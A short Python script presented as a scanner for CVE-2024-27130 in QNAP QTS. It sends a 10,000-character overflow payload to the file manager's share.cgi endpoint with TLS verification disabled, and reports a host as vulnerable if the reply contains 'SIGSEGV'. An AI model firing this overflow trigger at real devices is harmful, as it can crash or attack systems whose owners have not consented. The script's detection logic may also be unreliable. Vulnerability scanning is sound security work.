Checker.py

import requests
import argparse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_vulnerability(host):
    url = f"https://{host}/cgi-bin/filemanager/share.cgi"
    payload = {
        'func': 'get_file_size',
        'total': '1',
        'path': '/',
        'name': 'A' * 10000
    }

    try:
        response = requests.post(url, data=payload, verify=False, timeout=5)
        if response.status_code == 200:
            if "SIGSEGV" in response.text:
                print(f"The target {host} is vulnerable to CVE-2024-27130")
            else:
                print(f"The target {host} is not vulnerable to CVE-2024-27130")
        else:
            print(f"Failed to check vulnerability for {host}. Status code: {response.status_code}")
    except Exception as e:
        print(f"An error occurred while checking vulnerability for {host}: {str(e)}")

def main():
    parser = argparse.ArgumentParser(description="QNAP QTS CVE-2024-27130 Scanner")
    parser.add_argument("host", help="Target host IP address or domain name")
    args = parser.parse_args()

    check_vulnerability(args.host)

if __name__ == "__main__":
    main()